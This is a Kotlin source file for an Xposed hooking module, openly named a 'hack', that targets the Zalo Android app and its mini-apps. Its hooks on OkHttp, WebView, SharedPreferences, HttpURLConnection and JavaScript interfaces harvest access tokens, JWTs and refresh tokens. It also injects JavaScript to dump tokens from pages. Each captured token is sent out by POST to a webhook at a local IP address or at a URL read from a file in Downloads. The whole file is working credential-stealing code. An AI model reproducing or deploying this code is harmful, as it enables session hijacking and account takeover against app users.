package com.example.hack.hook

import android.util.Log
import de.robv.android.xposed.XC_MethodHook
import de.robv.android.xposed.XposedBridge
import de.robv.android.xposed.XposedHelpers
import org.json.JSONObject
import java.io.OutputStreamWriter
import java.net.HttpURLConnection
import java.net.URL
import kotlin.concurrent.thread

object ZaloHooker {

    private val seenTokens = mutableSetOf<String>()
    private const val TAG = "ZaloHacker"

    private val hookedClients = mutableSetOf<String>()
    private val hookedChromeClients = mutableSetOf<String>()

    @Volatile
    private var activeAppId: String = ""

    private fun getWebhookUrl(): String {
        try {
            val configFile = java.io.File(
                android.os.Environment.getExternalStoragePublicDirectory(android.os.Environment.DIRECTORY_DOWNLOADS),
                "zalo_hacker_config.txt"
            )
            if (configFile.exists()) {
                val url = configFile.readText().trim()
                if (url.isNotEmpty() && url.startsWith("http")) return url
            }
        } catch (e: Throwable) {}
        return "http://192.168.29.108:5000/token"
    }

    private fun getAppName(appId: String): String {
        // Hardcoded defaults
        val defaults = mapOf(
            "3151270984274302494" to "7up",
            "2284259347200678918" to "Coca"
        )
        if (defaults.containsKey(appId)) {
            return defaults[appId]!!
        }

        // Try reading from user-added apps config file generated by MainActivity
        try {
            val appsFile = java.io.File(
                android.os.Environment.getExternalStoragePublicDirectory(android.os.Environment.DIRECTORY_DOWNLOADS),
                "zalo_hacker_apps.txt"
            )
            if (appsFile.exists()) {
                val content = appsFile.readText()
                "(\\d+):([a-zA-Z0-9_-]+)".toRegex().findAll(content).forEach { match ->
                    if (match.groupValues[1] == appId) return match.groupValues[2]
                }
            }
        } catch (_: Throwable) {}

        return "MiniApp_$appId"
    }

    private fun extractAppId(rawData: String): String {
        // 1. Check URL path pattern: /zapps/<appId>/
        "/zapps/(\\d+)".toRegex().find(rawData)?.let {
            val id = it.groupValues[1]
            activeAppId = id
            return id
        }
        
        // 2. Check JSON pattern: "appId":"3151..." or "app_id":3151...
        "\"app_?[iI]d\"\\s*:\\s*\"?(\\d+)\"?".toRegex().find(rawData)?.let {
            val id = it.groupValues[1]
            activeAppId = id
            return id
        }

        // 3. Check Query parameter pattern: appId=3151... or app_id=3151...
        "app_?[iI]d=(\\d+)".toRegex(RegexOption.IGNORE_CASE).find(rawData)?.let {
            val id = it.groupValues[1]
            activeAppId = id
            return id
        }

        return ""
    }

    private fun sendTokenToServer(token: String, source: String, rawData: String) {
        if (token.length < 30) return
        val key = token.substring(0, 20)
        
        if (seenTokens.contains(key)) {
            Log.d(TAG, "Token trùng lặp ($source), bỏ qua gửi server nhưng phát broadcast đóng Zalo.")
            broadcastTokenCaptured()
            return
        }
        seenTokens.add(key)

        Log.i(TAG, "🔥 TOKEN BẮT ĐƯỢC từ [$source]: ${token.substring(0, 15)}...")

        var refreshToken = token
        try {
            "\"refresh_token\"\\s*:\\s*\"([^\"]+)\"".toRegex().find(rawData)?.let { refreshToken = it.groupValues[1] }
        } catch (e: Throwable) {}
        
        // Extract appId with dynamic tracking
        var appId = extractAppId(rawData)
        if (appId.isEmpty()) {
            appId = activeAppId
        }

        val name = if (appId.isNotEmpty()) getAppName(appId) else "MiniApp"

        val payload = JSONObject().apply {
            put("status", true)
            put("app_id", appId)
            put("name", name)
            put("access_token", token)
            put("refresh_token", refreshToken)
            put("expires_in", 3600)
            put("captured_at", System.currentTimeMillis())
            put("source", source)
        }

        thread {
            try {
                val targetUrl = getWebhookUrl()
                val conn = URL(targetUrl).openConnection() as HttpURLConnection
                conn.requestMethod = "POST"
                conn.setRequestProperty("Content-Type", "application/json")
                conn.doOutput = true
                OutputStreamWriter(conn.outputStream).use { it.write(payload.toString()) }
                val code = conn.responseCode
                Log.d(TAG, "Đã gửi webhook ($targetUrl). HTTP $code")
                broadcastLog("[$source] Token OK! ${token.substring(0, 12)}...")
                
                // Broadcast success event to return to Zalo Token app
                broadcastTokenCaptured()
            } catch (e: Throwable) {
                Log.e(TAG, "Lỗi gửi token: ${e.message}")
                broadcastLog("[ERROR] ${e.message}")
            }
        }
    }

    private fun tryParseToken(data: String?, source: String) {
        if (data.isNullOrEmpty() || data.length < 30) return
        try {
            val tokenRegex = "\"access_token\"\\s*:\\s*\"([^\"]{30,})\"".toRegex()
            val jwtRegex = "\"jwt\"\\s*:\\s*\"([^\"]{30,})\"".toRegex()
            val bearerRegex = "Bearer ([A-Za-z0-9\\-_.~+/]+=*)".toRegex()
            var match = tokenRegex.find(data) ?: jwtRegex.find(data) ?: bearerRegex.find(data)
            if (match != null) {
                sendTokenToServer(match.groupValues[1], source, data)
            }
        } catch (e: Throwable) {
            Log.e(TAG, "Parse error", e)
        }
    }

    private fun broadcastLog(message: String) {
        try {
            val at = XposedHelpers.callStaticMethod(
                XposedHelpers.findClass("android.app.ActivityThread", null),
                "currentActivityThread"
            )
            val ctx = XposedHelpers.callMethod(at, "getSystemContext") as? android.content.Context
            ctx?.sendBroadcast(android.content.Intent("com.autopee.LOG_EVENT").apply {
                putExtra("log", message)
            })
        } catch (_: Throwable) {}
    }

    private fun broadcastTokenCaptured() {
        try {
            val at = XposedHelpers.callStaticMethod(
                XposedHelpers.findClass("android.app.ActivityThread", null),
                "currentActivityThread"
            )
            val ctx = XposedHelpers.callMethod(at, "getSystemContext") as? android.content.Context
            ctx?.sendBroadcast(android.content.Intent("com.autopee.TOKEN_CAPTURED"))
        } catch (_: Throwable) {}
    }

    // ─────────────────────────────────────────────────
    // HOOK 1: OkHttp
    // ─────────────────────────────────────────────────
    fun hookOkHttp(classLoader: ClassLoader) {
        val candidateClasses = listOf(
            "okhttp3.ResponseBody",
            "okhttp3.internal.http.RealResponseBody",
            "com.squareup.okhttp3.ResponseBody",
            "j.b",  // obfuscated variants
            "k.b",
            "l.b"
        )
        for (className in candidateClasses) {
            try {
                val cls = XposedHelpers.findClass(className, classLoader)
                XposedBridge.hookAllMethods(cls, "string", object : XC_MethodHook() {
                    override fun afterHookedMethod(param: MethodHookParam) {
                        val result = param.result as? String ?: return
                        tryParseToken(result, "OkHttp/$className")
                    }
                })
                Log.d(TAG, "✅ OkHttp ResponseBody.string() hooked: $className")
                break
            } catch (_: Throwable) {}
        }
    }

    // ─────────────────────────────────────────────────
    // HOOK 2: WebView Client subclasses
    // ─────────────────────────────────────────────────
    private fun hookWebViewClientSubclass(clazz: Class<*>) {
        val className = clazz.name
        if (hookedClients.contains(className)) return
        hookedClients.add(className)

        // Hook shouldOverrideUrlLoading (cả String và WebResourceRequest)
        try {
            XposedBridge.hookAllMethods(clazz, "shouldOverrideUrlLoading", object : XC_MethodHook() {
                override fun beforeHookedMethod(param: MethodHookParam) {
                    val arg1 = param.args.getOrNull(1) ?: return
                    var url: String? = null
                    if (arg1 is String) {
                        url = arg1
                    } else {
                        try {
                            val getUrlMethod = arg1.javaClass.getMethod("getUrl")
                            val uri = getUrlMethod.invoke(arg1) as? android.net.Uri
                            url = uri?.toString()
                        } catch (_: Throwable) {}
                    }
                    if (url != null) {
                        extractAppId(url)
                        if (url.contains("access_token")) {
                            val tokenMatch = "access_token=([^&]+)".toRegex().find(url)
                            if (tokenMatch != null) {
                                tryParseToken("{\"access_token\":\"${tokenMatch.groupValues[1]}\"}", "shouldOverrideUrlLoading")
                            }
                        }
                    }
                }
            })
            Log.d(TAG, "✅ Subclass WebViewClient hook: $className.shouldOverrideUrlLoading")
        } catch (_: Throwable) {}

        // Hook onPageFinished
        try {
            XposedBridge.hookAllMethods(clazz, "onPageFinished", object : XC_MethodHook() {
                override fun afterHookedMethod(param: MethodHookParam) {
                    val url = param.args.getOrNull(1) as? String ?: return
                    extractAppId(url)
                    if (url.contains("zalo.me/openapi/access_token") || url.contains("access_token")) {
                        val webView = param.args[0] ?: return
                        val js = "javascript:void((function(){try{var b=document.body.innerText||document.body.textContent;if(b&&b.indexOf('access_token')!==-1){console.log('##ZALO_TOKEN_JS##'+b)}}catch(e){}})())"
                        try {
                            XposedHelpers.callMethod(webView, "loadUrl", js)
                        } catch (_: Throwable) {}
                    }
                }
            })
            Log.d(TAG, "✅ Subclass WebViewClient hook: $className.onPageFinished")
        } catch (_: Throwable) {}
    }

    // ─────────────────────────────────────────────────
    // HOOK 2b: WebChromeClient subclasses
    // ─────────────────────────────────────────────────
    private fun hookWebChromeClientSubclass(clazz: Class<*>) {
        val className = clazz.name
        if (hookedChromeClients.contains(className)) return
        hookedChromeClients.add(className)

        try {
            XposedBridge.hookAllMethods(clazz, "onConsoleMessage", object : XC_MethodHook() {
                override fun beforeHookedMethod(param: MethodHookParam) {
                    val consoleMsg = param.args[0] ?: return
                    val text = try {
                        XposedHelpers.callMethod(consoleMsg, "message") as? String
                    } catch (_: Throwable) { null } ?: return

                    if (text.contains("##ZALO_TOKEN_JS##")) {
                        val body = text.split("##ZALO_TOKEN_JS##").getOrNull(1) ?: return
                        tryParseToken(body, "JSConsole_TokenExchanger")
                    } else if (text.contains("access_token")) {
                        tryParseToken(text, "JSConsole_direct")
                    }
                }
            })
            Log.d(TAG, "✅ Subclass WebChromeClient hook: $className.onConsoleMessage")
        } catch (_: Throwable) {}
    }

    // ─────────────────────────────────────────────────
    // HOOK 3: WebView Core (loadUrl, evaluateJavascript, setClient)
    // ─────────────────────────────────────────────────
    fun hookWebView(classLoader: ClassLoader) {
        try {
            val webViewClass = XposedHelpers.findClass("android.webkit.WebView", classLoader)

            // Hook loadUrl
            XposedBridge.hookAllMethods(webViewClass, "loadUrl", object : XC_MethodHook() {
                override fun beforeHookedMethod(param: MethodHookParam) {
                    val url = param.args[0] as? String ?: return
                    extractAppId(url)
                    if (url.contains("access_token") || url.contains("jwt") || url.contains("zalo.me/openapi")) {
                        tryParseToken(url, "WebView_loadUrl")
                    }
                }
            })

            // Hook evaluateJavascript & ValueCallback của nó để hứng giá trị trả về
            XposedBridge.hookAllMethods(webViewClass, "evaluateJavascript", object : XC_MethodHook() {
                override fun beforeHookedMethod(param: MethodHookParam) {
                    val script = param.args[0] as? String ?: return
                    extractAppId(script)
                    if (script.contains("access_token") || script.contains("jwt")) {
                        tryParseToken(script, "WebView_evalJS_script")
                    }
                    
                    // Hook callback class để lấy dữ liệu trả về từ evaluateJavascript
                    val callback = param.args.getOrNull(1) ?: return
                    try {
                        XposedBridge.hookAllMethods(callback.javaClass, "onReceiveValue", object : XC_MethodHook() {
                            override fun beforeHookedMethod(p: MethodHookParam) {
                                val value = p.args.getOrNull(0) as? String ?: return
                                if (value.contains("access_token") || value.contains("jwt")) {
                                    tryParseToken(value, "WebView_evalJS_callback")
                                }
                            }
                        })
                    } catch (_: Throwable) {}
                }
            })

            // Hook setWebViewClient để lấy class client thực tế của Zalo
            XposedBridge.hookAllMethods(webViewClass, "setWebViewClient", object : XC_MethodHook() {
                override fun beforeHookedMethod(param: MethodHookParam) {
                    val client = param.args.getOrNull(0) ?: return
                    hookWebViewClientSubclass(client.javaClass)
                }
            })

            // Hook setWebChromeClient để lấy class chrome client thực tế của Zalo
            XposedBridge.hookAllMethods(webViewClass, "setWebChromeClient", object : XC_MethodHook() {
                override fun beforeHookedMethod(param: MethodHookParam) {
                    val client = param.args.getOrNull(0) ?: return
                    hookWebChromeClientSubclass(client.javaClass)
                }
            })

            Log.d(TAG, "✅ WebView Core hooks registered successfully")
        } catch (e: Throwable) {
            Log.e(TAG, "WebView Core hooks failed: ${e.message}")
        }
    }

    // ─────────────────────────────────────────────────
    // HOOK 4: SharedPreferences
    // ─────────────────────────────────────────────────
    fun hookSharedPreferences(classLoader: ClassLoader) {
        try {
            val editorClass = XposedHelpers.findClass("android.app.SharedPreferencesImpl\$EditorImpl", classLoader)
            XposedBridge.hookAllMethods(editorClass, "putString", object : XC_MethodHook() {
                override fun beforeHookedMethod(param: MethodHookParam) {
                    val key = param.args[0] as? String ?: return
                    val value = param.args[1] as? String ?: return
                    if (value.length > 30 && (key.contains("token", ignoreCase = true)
                                || key.contains("zma", ignoreCase = true)
                                || key.contains("access", ignoreCase = true)
                                || key.contains("jwt", ignoreCase = true))) {
                        tryParseToken("{\"access_token\":\"$value\"}", "SharedPrefs_$key")
                    }
                }
            })
            Log.d(TAG, "✅ SharedPreferences putString hooked")
        } catch (e: Throwable) {
            Log.e(TAG, "SharedPrefs putString hook failed: ${e.message}")
        }

        try {
            val prefsClass = XposedHelpers.findClass("android.app.SharedPreferencesImpl", classLoader)
            XposedBridge.hookAllMethods(prefsClass, "getString", object : XC_MethodHook() {
                override fun afterHookedMethod(param: MethodHookParam) {
                    val key = param.args.getOrNull(0) as? String ?: return
                    val value = param.result as? String ?: return
                    if (value.length > 30 && (key.contains("token", ignoreCase = true)
                                || key.contains("zma", ignoreCase = true)
                                || key.contains("access", ignoreCase = true)
                                || key.contains("jwt", ignoreCase = true))) {
                        tryParseToken("{\"access_token\":\"$value\"}", "SharedPrefs_get_$key")
                    }
                }
            })
            Log.d(TAG, "✅ SharedPreferences getString hooked")
        } catch (e: Throwable) {
            Log.e(TAG, "SharedPrefs getString hook failed: ${e.message}")
        }
    }

    // ─────────────────────────────────────────────────
    // HOOK 5: HttpURLConnection
    // ─────────────────────────────────────────────────
    fun hookHttpUrlConnection(classLoader: ClassLoader) {
        try {
            val connClass = XposedHelpers.findClass("com.android.okhttp.internal.huc.HttpURLConnectionImpl", classLoader)
            XposedBridge.hookAllMethods(connClass, "getInputStream", object : XC_MethodHook() {
                override fun afterHookedMethod(param: MethodHookParam) {
                    try {
                        val stream = param.result as? java.io.InputStream ?: return
                        val content = stream.bufferedReader().readText()
                        tryParseToken(content, "HttpURLConnection")
                    } catch (_: Throwable) {}
                }
            })
            Log.d(TAG, "✅ HttpURLConnection hooked")
        } catch (_: Throwable) {}
    }

    // ─────────────────────────────────────────────────
    // HOOK 6: JavaScript Interface
    // ─────────────────────────────────────────────────
    fun hookJavaScriptInterface(classLoader: ClassLoader) {
        try {
            val webViewClass = XposedHelpers.findClass("android.webkit.WebView", classLoader)
            XposedBridge.hookAllMethods(webViewClass, "addJavascriptInterface", object : XC_MethodHook() {
                override fun beforeHookedMethod(param: MethodHookParam) {
                    val obj = param.args[0] ?: return
                    val methods = obj.javaClass.declaredMethods
                    for (method in methods) {
                        if (method.parameterTypes.size == 1 && method.parameterTypes[0] == String::class.java) {
                            try {
                                XposedBridge.hookMethod(method, object : XC_MethodHook() {
                                    override fun beforeHookedMethod(p: MethodHookParam) {
                                        val data = p.args[0] as? String ?: return
                                        tryParseToken(data, "JSInterface_req_${method.name}")
                                    }
                                    override fun afterHookedMethod(p: MethodHookParam) {
                                        val res = p.result as? String ?: return
                                        tryParseToken(res, "JSInterface_res_${method.name}")
                                    }
                                })
                            } catch (_: Throwable) {}
                        }
                    }
                }
            })
            Log.d(TAG, "✅ JSInterface hooked")
        } catch (_: Throwable) {}
    }
}
